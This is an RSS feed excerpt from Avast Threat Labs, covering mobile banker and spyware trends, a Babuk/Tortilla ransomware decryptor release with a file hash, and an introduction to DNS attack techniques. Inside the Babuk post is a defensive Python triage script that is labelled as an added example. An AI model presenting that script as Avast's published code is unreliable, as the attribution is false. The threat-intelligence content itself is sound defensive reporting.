  4547. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="623" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-623x1024.jpg" alt="" class="wp-image-8006" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-623x1024.jpg 623w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-182x300.jpg 182w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-768x1263.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-934x1536.jpg 934w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout.jpg 1080w" sizes="(max-width: 623px) 100vw, 623px" /><figcaption class="wp-element-caption">FakeRust using the RustDesk layout but changing the title to Support in Cyrillic</figcaption></figure></div>
  4548.  
  4549.  
  4550. <p>For several quarters, we have observed a decline in the prevalence of bankers. We suspect that spreading updated and new banker strains is becoming harder, hence the lower numbers of victims in the past year. It is likely that phishing websites and direct messaging through WhatsApp and other messengers aren’t as effective as the widespread SMS campaigns of the past.</p>
  4551.  
  4552.  
  4553. <div class="wp-block-image">
  4554. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8007" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile bankers in Q1/2023-Q4/2023</figcaption></figure></div>
  4555.  
  4556.  
  4557. <p>Turkey has the highest risk ratio this quarter, followed by Spain and Singapore. The focus this quarter remained on Europe, with fewer bankers spotted in Australia compared to last quarter.</p>
  4558.  
  4559.  
  4560. <div class="wp-block-image">
  4561. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1024x639.png" alt="" class="wp-image-8008" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile bankers in Q4/2023</figcaption></figure></div>
  4562.  
  4563.  
  4564. <h3 class="wp-block-heading">SpyLoans and Malicious WhatsApp mods</h3>
  4565.  
  4566.  
  4567.  
  4568. <p><em>Spyware is used to spy on unsuspecting victims with the intent of extracting personal information such as messages, photos, location, or login details. It uses fake adverts, phishing messages, and modifications of popular applications to spread and harvest user information. State-backed commercial spyware is becoming more prevalent and is used to target individuals with 0-day exploits.</em></p>
  4569.  
  4570.  
  4571.  
  4572. <p>Spymax continues to be the most prevalent spyware strain in Q4 2023, trailed by SexInfoSteal, RealRAT and WAMods. Several new spyware strains entered the fray this quarter, one even attempting to infect iOS devices to steal user data. Malicious messenger mods for WhatsApp continue to spread, and users are advised to refrain from installing messenger mods. Finally, SpyLoans continue to be a blackmailing menace that even threatens users with physical violence if they don’t pay excessive amounts of money to the threat actors.</p>
  4573.  
  4574.  
  4575.  
  4576. <p>A new backdoor spyware has also entered the market through the PlayStore. Called <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/stealth-backdoor-android-xamalicious-actively-infecting-devices/" target="_blank" rel="noreferrer noopener">Xamalicious</a>, it uses an open-source framework called Xamarin, which can be used to build Android and iOS apps with .NET and C#. The use of the Xamarin framework has helped the malware authors stay undetected and on the PlayStore for extended periods of time. While Xamalicious has been taken down from the PlayStore, many of these apps remain available on third-party marketplaces. Once installed on the victim’s device, it tries to obtain Accessibility privileges, with which it downloads a second-stage payload assembly DLL that allows it to take full control of the device. It has been seen installing other malicious apps, clicking on adverts, and stealing sensitive user data. Specifically, it collects device details, location and lists of apps, and may access messages as well. We observe Xamalicious mainly targeting Brazil, the UK and the US.</p>
  4577.  
  4578.  
  4579. <div class="wp-block-image">
  4580. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="476" height="757" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt.png" alt="" class="wp-image-8009" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt.png 476w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt-189x300.png 189w" sizes="(max-width: 476px) 100vw, 476px" /><figcaption class="wp-element-caption">Xamalicious requesting Accessibility privileges to take over the victim’s device</figcaption></figure></div>
  4581.  
  4582.  
  4583. <p>A new <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fake-android-and-ios-apps-steal-sms-and-contacts-in-south-korea/" target="_blank" rel="noreferrer noopener">SpyAgent</a> is also targeting South Korean users through direct messages and phishing websites that mimic legitimate services such as messengers or yoga training apps. Interestingly, this threat targets both Android and iOS. Once installed on Android, it tries to steal contact information and SMS messages and can monitor calls, all of which are sent to the malware authors. While on Android the distribution process is the same as for other spyware, on iOS the threat actors use Scarlet, a third-party tool that allows installing apps from outside the AppStore. Users who already have Scarlet with a certificate set to ‘Trust’ expose their devices to this spyware, which can run at any time once installed. Scarlet then collects contact info from iOS users that is likely used for further distribution of the malware or other fraudulent activities.</p>
  4584.  
  4585.  
  4586. <div class="wp-block-image">
  4587. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="576" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent.png" alt="" class="wp-image-8010" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent.png 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent-169x300.png 169w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption">Fake website that mimics the AppStore, prompting the victim to download and install the SpyAgent</figcaption></figure></div>
  4588.  
  4589.  
  4590. <p>Our telemetry shows a continued rise in the prevalence of SpyLoans in 2023: fake loan applications that harvest user data, which is then used to extort victims into sending money to the malware authors. Another round of these applications was present on the PlayStore, as <a href="https://www.welivesecurity.com/en/eset-research/beware-predatory-fintech-loan-sharks-use-android-apps-reach-new-depths/" target="_blank" rel="noreferrer noopener">reported by ESET</a>.</p>
  4591.  
  4592.  
  4593.  
  4594. <p>Despite their removal, these applications are increasingly propagated through SMS messages, but also on social media such as TikTok, Facebook and YouTube. Several of these malware families also had fake loan websites set up, giving them the appearance of legitimacy. In some cases, the threat actors also impersonate reputable loan providers. Once installed, the SpyLoan uses SMS verification to check that the user is from a specific country, followed by an extensive and invasive loan application that requires the victim to grant access to their contacts, messages, bank account information, ID cards and photos on their device. Social media reviews highlight the dismay of victims as the malware authors threaten to send sensitive information to their friends and relatives, in some cases even threatening physical harm.</p>
  4595.  
  4596.  
  4597. <div class="wp-block-image">
  4598. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="623" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-623x1024.jpg" alt="" class="wp-image-8011" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-623x1024.jpg 623w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-183x300.jpg 183w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-768x1262.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-935x1536.jpg 935w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID.jpg 1080w" sizes="(max-width: 623px) 100vw, 623px" /><figcaption class="wp-element-caption"><em>SpyLoan malware directing the victim to upload photos of their ID card</em></figcaption></figure></div>
  4599.  
  4600.  
  4601. <p>As reported last quarter, we continued to observe malicious mods for popular messengers such as WhatsApp and Telegram in Q4 2023. In an interesting twist, <a href="https://securelist.com/spyware-whatsapp-mod/110984/" target="_blank" rel="noreferrer noopener">spyware WhatsApp mods</a> were seen distributed through Telegram. Once users install the malicious mod, it sets up monitoring of the device, such as which applications are used, when new messages arrive or when new files are downloaded. These events trigger the spy module, which starts listening and sends any interesting information to the malware authors. It then listens for further commands, which may include sending files to a C2 server, recording sound, and uploading contacts and messages, among others. It appears these spyware mods are targeting Arabic-speaking countries, as the developers set up their C2 servers in Arabic. It is likely we will see more malicious spyware mods for these popular applications going forward.</p>
  4602.  
  4603.  
  4604. <div class="wp-block-image">
  4605. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="443" height="185" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts.png" alt="" class="wp-image-8012" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts.png 443w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts-300x125.png 300w" sizes="(max-width: 443px) 100vw, 443px" /><figcaption class="wp-element-caption">WhatsApp mod monitoring information about the victim’s accounts and contacts, initiated every 5 minutes and sent to C2 server</figcaption></figure></div>
  4606.  
  4607.  
  4608. <p>Spyware has decreased in prevalence this quarter, despite the newly found strains of malicious mods, SpyLoans and others. With this, the risk ratio has also decreased compared to last quarter.</p>
  4609.  
  4610.  
  4611. <div class="wp-block-image">
  4612. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8013" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile spyware in Q3/2023 and Q4/2023</figcaption></figure></div>
  4613.  
  4614.  
  4615. <p>Brazil, Turkey, and the US have the highest numbers of protected users this quarter. However, the risk ratio in all three has gone down. Yemen, Turkey, and Egypt have the highest risk ratios this quarter.</p>
  4616.  
  4617.  
  4618. <div class="wp-block-image">
  4619. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1024x639.png" alt="" class="wp-image-8014" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile spyware in Q4/2023</figcaption></figure></div>
  4620.  
  4621.  
  4622. <p class="has-text-align-right"><em>Jakub Vávra, Malware Analyst</em></p>
  4623.  
  4624.  
  4625.  
  4626. <h2 class="wp-block-heading">Acknowledgements / Credits</h2>
  4627.  
  4628.  
  4629.  
  4630. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-1 wp-block-columns-is-layout-flex">
  4631. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  4632. <h6 class="wp-block-heading">Malware researchers</h6>
  4633.  
  4634.  
  4635.  
  4636. <p>Adolf Středa<br>Alexej Savčin<br>Branislav Kramár<br>David Álvarez<br>David Jursa<br>Igor Morgenstern<br>Jakub Křoustek<br>Jakub Vávra<br>Jan Rubín<br>Jan Vojtěšek<br>Ladislav Zezula<br>Luigino Camastra<br>Luis Corrons<br>Martin Chlumecký<br>Matěj Krčma<br>Michal Salát<br>Ondřej Mokoš</p>
  4637. </div>
  4638.  
  4639.  
  4640.  
  4641. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  4642. <h6 class="wp-block-heading">Data analysts</h6>
  4643.  
  4644.  
  4645.  
  4646. <p>Pavol Plaskoň<br>Filip Husák<br>Lukáš Zobal</p>
  4647. </div>
  4648.  
  4649.  
  4650.  
  4651. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  4652. <h6 class="wp-block-heading">Communications</h6>
  4653.  
  4654.  
  4655.  
  4656. <p>Brittany Posey<br>Emma McGowan</p>
  4657. </div>
  4658. </div>
  4659. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/">Avast Q4/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4660. ]]></content:encoded>
  4661. </item>
  4662. <item>
  4663. <title>Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</title>
  4664. <link>https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police</link>
  4665. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  4666. <pubDate>Tue, 09 Jan 2024 09:00:00 +0000</pubDate>
  4667. <category><![CDATA[PC]]></category>
  4668. <category><![CDATA[decryptor]]></category>
  4669. <category><![CDATA[decryptors]]></category>
  4670. <category><![CDATA[ransomware]]></category>
  4671. <guid isPermaLink="false">https://decoded.avast.io/?p=7916</guid>
  4672.  
  4673. <description><![CDATA[<p>In cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla.</p>
  4674. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/">Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4675. ]]></description>
  4676. <content:encoded><![CDATA[
  4677. <p>Babuk, an advanced ransomware strain, was publicly discovered in 2021. Since then, Avast has blocked more than 5,600 targeted attacks, mostly in Brazil, the Czech Republic, India, the United States, and Germany.</p>
  4678.  
  4679.  
  4680.  
  4681. <p>Today, in cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called <a href="https://blog.talosintelligence.com/babuk-exploits-exchange/" target="_blank" rel="noreferrer noopener">Tortilla</a>. To download the tool, click <a href="https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe" target="_blank" rel="noreferrer noopener">here</a>.</p>
  4682.  
  4683.  
  4684. <div class="wp-block-image">
  4685. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1024x639.png" alt="" class="wp-image-7917" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Babuk attacks blocked by Avast since 2021</figcaption></figure></div>
  4686.  
  4687.  
  4688. <h2 class="wp-block-heading">Babuk Ransomware Decryptor&nbsp;</h2>
  4689.  
  4690.  
  4691.  
  4692. <p>In September 2021, the <a href="https://www.bleepingcomputer.com/news/security/babuk-ransomwares-full-source-code-leaked-on-hacker-forum/" target="_blank" rel="noreferrer noopener">source code of the Babuk ransomware was released</a> on a Russian-speaking hacking forum. The ZIP file also contained 14 private keys (one for each victim). Those keys were ECDH-25519 private keys needed for decryption of files encrypted by the Babuk ransomware.&nbsp;</p>
  4693.  
  4694.  
  4695.  
  4696. <h3 class="wp-block-heading">The Tortilla Campaign&nbsp;</h3>
  4697.  
  4698.  
  4699.  
  4700. <p>After a brief examination of the provided sample (originally named tortilla.exe), we found that the encryption scheme had not changed <a href="https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/" target="_blank" rel="noreferrer noopener">since we analyzed Babuk samples 2 years ago</a>. Extending the decryptor was therefore straightforward.</p>
  4701.  
  4702.  
  4703.  
  4704. <p>The Babuk encryptor was likely created from the leaked sources using the build tool. According to Cisco Talos, a single private key is used for all victims of the Tortilla threat actor. This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files. As with all Avast decryptors, the Babuk Ransomware Decryptor is available for free.&nbsp;</p>
  4705.  
  4706.  
  4707.  
  4708. <p>Babuk victims can find out whether they were part of the Tortilla campaign by looking at the extension of the encrypted files and the ransom note file. Files encrypted by the ransomware have the <code>.babyk</code> extension as shown in the following example:</p>
  4709.  
  4710.  
  4711.  
  4712. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="879" height="399" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files.png" alt="" class="wp-image-7918" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files.png 879w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files-300x136.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files-768x349.png 768w" sizes="(max-width: 879px) 100vw, 879px" /></figure>
  4713.  
  4714.  
  4715.  
  4716. <p>The ransom note file is called <strong>How To Restore Your Files.txt</strong> and is dropped into every directory. This is what the ransom note looks like:</p>
  4717.  
  4718.  
  4719.  
  4720. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-1024x647.png" alt="" class="wp-image-7919" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-1024x647.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-300x189.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-768x485.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note.png 1042w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  4721.  
  4722.  
  4723.  
  4724. <p>Babuk victims can download the Babuk Decryptor for free: <a href="https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe" target="_blank" rel="noreferrer noopener">https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe</a>. It is also available within the NoMoreRansom project.&nbsp;</p>
  4725.  
  4726.  
  4727.  
  4728. <p>We would like to thank Cisco Talos and the Dutch Police for the cooperation.</p>
  4729.  
  4730.  
  4731.  
  4732. <h3 class="wp-block-heading">IOCs (indicators of compromise)&nbsp;</h3>
  4733.  
  4734.  
  4735.  
  4736. <p><code>bd26b65807026a70909d38c48f2a9e0f8730b1126e80ef078e29e10379722b49 (tortilla.exe) </code></p>
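<p>As an added example (not part of this post and not the Avast decryptor's code), the following Python script performs the identification described above on a directory tree: it counts files carrying the <code>.babyk</code> extension, locates copies of <strong>How To Restore Your Files.txt</strong>, and compares the SHA-256 of any executable it finds against the <code>tortilla.exe</code> hash from the IoC list. The directory tree it builds is constructed for the demonstration; the placeholder file contents are not real ciphertext and the placeholder <code>tortilla.exe</code> deliberately does not match the published hash.</p>

```python
"""Triage a directory tree for the Babuk/Tortilla artifacts named in the post.

Added example, not Avast's decryptor code. Indicators used: the .babyk
extension of encrypted files, the ransom note file name, and the SHA-256 of
tortilla.exe from the IoC list. The sample tree is constructed for the demo.
"""
import hashlib
import os
import tempfile

ENCRYPTED_EXT = ".babyk"
RANSOM_NOTE = "How To Restore Your Files.txt"
# SHA-256 of tortilla.exe as listed in the IoC section of the post.
TORTILLA_SHA256 = "bd26b65807026a70909d38c48f2a9e0f8730b1126e80ef078e29e10379722b49"


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage(root):
    """Walk root and collect Babuk/Tortilla indicators into a dict."""
    result = {
        "encrypted_files": [],   # files carrying the .babyk extension
        "ransom_notes": [],      # copies of the ransom note
        "sample_name_hits": [],  # executables named tortilla.exe
        "ioc_hash_matches": [],  # executables whose hash equals the IoC
    }
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower.endswith(ENCRYPTED_EXT):
                result["encrypted_files"].append(path)
            elif name == RANSOM_NOTE:
                result["ransom_notes"].append(path)
            elif lower.endswith(".exe"):
                # Only executables are hashed, to keep the walk cheap on a real host.
                if lower == "tortilla.exe":
                    result["sample_name_hits"].append(path)
                if sha256_file(path) == TORTILLA_SHA256:
                    result["ioc_hash_matches"].append(path)
    # Both the extension and the note are needed to call it a Babuk incident;
    # a hash match on its own shows the sample is present, not that it ran.
    result["likely_babuk"] = bool(result["encrypted_files"]) and bool(result["ransom_notes"])
    return result


def build_sample_tree(infected=True):
    """Create a constructed directory tree and return its path.

    With infected=True it imitates a host hit by Tortilla: two .babyk files,
    the ransom note in two directories and a placeholder named tortilla.exe
    whose bytes deliberately do not match the published hash.
    """
    root = tempfile.mkdtemp(prefix="babuk-triage-")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    with open(os.path.join(root, "untouched.txt"), "w") as fh:
        fh.write("not encrypted\n")
    if not infected:
        return root
    for name in ("report.docx" + ENCRYPTED_EXT, "photo.jpg" + ENCRYPTED_EXT):
        with open(os.path.join(docs, name), "wb") as fh:
            fh.write(b"\x00" * 64)  # placeholder ciphertext, constructed
    for directory in (root, docs):
        with open(os.path.join(directory, RANSOM_NOTE), "w") as fh:
            fh.write("placeholder ransom note text\n")
    with open(os.path.join(root, "tortilla.exe"), "wb") as fh:
        fh.write(b"MZ placeholder, not the real sample\n")
    return root


if __name__ == "__main__":
    summary = triage(build_sample_tree())
    for key, value in summary.items():
        print(f"{key}: {value if isinstance(value, bool) else len(value)}")
```

<p>Point <code>triage()</code> at the root of an affected volume to use it on a real host; the constructed tree only exercises the code paths. A positive <code>likely_babuk</code> result means the victim can proceed to the decryptor linked above, while a hash match alone merely confirms the Tortilla dropper is present.</p>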
  4737. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/">Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4738. ]]></content:encoded>
  4739. </item>
  4740. <item>
  4741. <title>Opening a new front against DNS-based threats</title>
  4742. <link>https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=opening-a-new-front-against-dns-based-threats</link>
  4743. <dc:creator><![CDATA[Threat Intelligence Team]]></dc:creator>
  4744. <pubDate>Thu, 14 Dec 2023 17:25:31 +0000</pubDate>
  4745. <category><![CDATA[PC]]></category>
  4746. <category><![CDATA[DNS]]></category>
  4747. <category><![CDATA[malware]]></category>
  4748. <category><![CDATA[protection]]></category>
  4749. <category><![CDATA[threats]]></category>
  4750. <guid isPermaLink="false">https://decoded.avast.io/?p=7890</guid>
  4751.  
  4752. <description><![CDATA[<p>DNS is a hierarchical decentralized naming system. There are multiple ways in which threat actors can leverage DNS to carry out attacks. We will provide an introduction to the DNS threat landscape.</p>
  4753. <p>The post <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/">Opening a new front against DNS-based threats</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4754. ]]></description>
  4755. <content:encoded><![CDATA[
  4756. <p>Domain Name System (DNS) is a hierarchical decentralized naming system for numerous network devices connected to the internet or a private network. Its primary function is to translate user-friendly domain names, such as <a href="http://www.avast.com" target="_blank" rel="noreferrer noopener">www.avast.com</a>, into numerical IP addresses that devices use to identify each other on a network.</p>
  4757.  
  4758.  
  4759.  
  4760. <p>When a domain name is entered into a web browser, the computer first checks its local cache to see if it already knows the corresponding IP address. If the IP address is not found locally, the computer queries a DNS resolver, which could be one run by the Internet Service Provider (ISP) or a third-party service like Google&#8217;s 8.8.8.8. The resolver then checks its own cache. If the IP address is not found there either, a recursive resolver acts as a client itself and queries the root DNS servers.</p>
  4761.  
  4762.  
  4763.  
  4764. <p>As with basically any other technology, however, this system can also become a target of malicious actors. Let’s look at how Avast can protect users against various DNS threats, showcasing a few notorious malware families.</p>
  4765.  
  4766.  
  4767.  
  4768. <h2 class="wp-block-heading">How DNS threats work</h2>
  4769.  
  4770.  
  4771.  
  4772. <p>There are multiple ways in which threat actors can leverage DNS to carry out attacks, and it is out of the scope of this text to describe all the existing techniques in detail. However, we will provide a brief introduction to the DNS threat landscape so that the reader can see how attacks like these work and why threat actors are interested in such vectors.</p>
  4773.  
  4774.  
  4775.  
  4776. <p><code>Rogue/malicious DNS servers</code> are specifically set up by threat actors to intercept and manipulate DNS queries. When a device queries DNS, the rogue DNS server can then respond with incorrect or malicious IP addresses, redirecting legitimate traffic to malicious destinations.</p>
  4777.  
  4778.  
  4779.  
  4780. <p><code>DNS tunneling</code> is a technique where attackers use the DNS protocol to encapsulate non-DNS traffic. The communication can be bidirectional, meaning both requests and responses can carry encapsulated data. It is usually used, but not limited to, exchanging malware commands with a Command &amp; Control (C2) server and/or exfiltrating data from the victims.</p>
  4781.  
  4782.  
  4783.  
  4784. <p><code>DNS cache poisoning</code>, also known as <code>DNS spoofing</code>, is a technique where attackers manipulate the DNS cache of a resolver, introducing false mappings between domain names and IP addresses. By injecting false DNS records into the cache, attackers usually redirect users to malicious sites where they are then able to intercept sensitive information, which lets them perform man-in-the-middle (MitM) attacks. This technique is particularly dangerous because, once spoofing succeeds, the domains look legitimate to the user: the domain names are the ones the user is used to, yet they lead to a different server at a different IP address.</p>
  4785.  
  4786.  
  4787.  
  4788. <p><code>DNS fast fluxing</code> is based on rapidly and regularly changing the IP addresses for a domain in the DNS records, making it more difficult to track and block the attackers’ infrastructure. Usually, the attackers either have a set of compromised servers/botnet that they can use, or they use a specific approach for changing the IP addresses, behaving similarly to a more traditional domain generation algorithm (DGA).</p>
  4789.  
  4790.  
  4791.  
  4792. <h3 class="wp-block-heading">Why do attackers do it?</h3>
  4793.  
  4794.  
  4795.  
  4796. <p>The reasons attackers carry out this type of attack vary with their techniques as well as their intent. However, the malicious purposes can be summed up in these short points:</p>
  4797.  
  4798.  
  4799.  
  4800. <ul>
  4801. <li>The malware can <strong>receive commands and instructions</strong>, enabling two-way communication&nbsp;</li>
  4802.  
  4803.  
  4804.  
  4805. <li>The threat actor can <strong>deploy</strong> <strong>an additional payload</strong> onto the infected device&nbsp;</li>
  4806.  
  4807.  
  4808.  
  4809. <li>Information stealers can <strong>exfiltrate sensitive data</strong> from the infected device&nbsp;</li>
  4810.  
  4811.  
  4812.  
  4813. <li>The communication is more <strong>obfuscated</strong>, rendering it more difficult to track properly&nbsp;</li>
  4814.  
  4815.  
  4816.  
  4817. <li>The communication is usually <strong>enabled by default</strong>, since the traffic operates on a common port 53&nbsp;</li>
  4818.  
  4819.  
  4820.  
  4821. <li>The traffic may <strong>bypass traditional AVs and gateways</strong> due to the possible lack of monitoring and scanning</li>
  4822. </ul>
  4823.  
  4824.  
  4825.  
